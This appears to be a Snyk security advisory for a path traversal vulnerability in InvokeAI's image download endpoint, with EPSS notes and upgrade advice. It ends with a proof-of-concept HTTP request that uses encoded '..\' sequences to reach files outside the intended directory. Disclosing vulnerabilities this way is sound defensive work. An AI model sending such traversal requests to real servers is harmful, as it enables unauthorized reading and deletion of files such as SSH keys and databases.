Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade InvokeAI to version 6.7.0 or higher.
InvokeAI is an An implementation of Stable Diffusion which provides various new features and options to aid the image generation process
Affected versions of this package are vulnerable to External Control of File Name or Path via the GET /api/v1/images/download/{bulk_download_item_name} endpoint. An attacker can read and delete arbitrary files on the server, including sensitive files such as SSH keys, databases, and configuration files, by manipulating the filename arguments.
GET /api/v1/images/download/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cBugs%5ctest.txt HTTP/1.1
Host: invoke.ai:9090
Referer: http://invoke.ai:9090/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive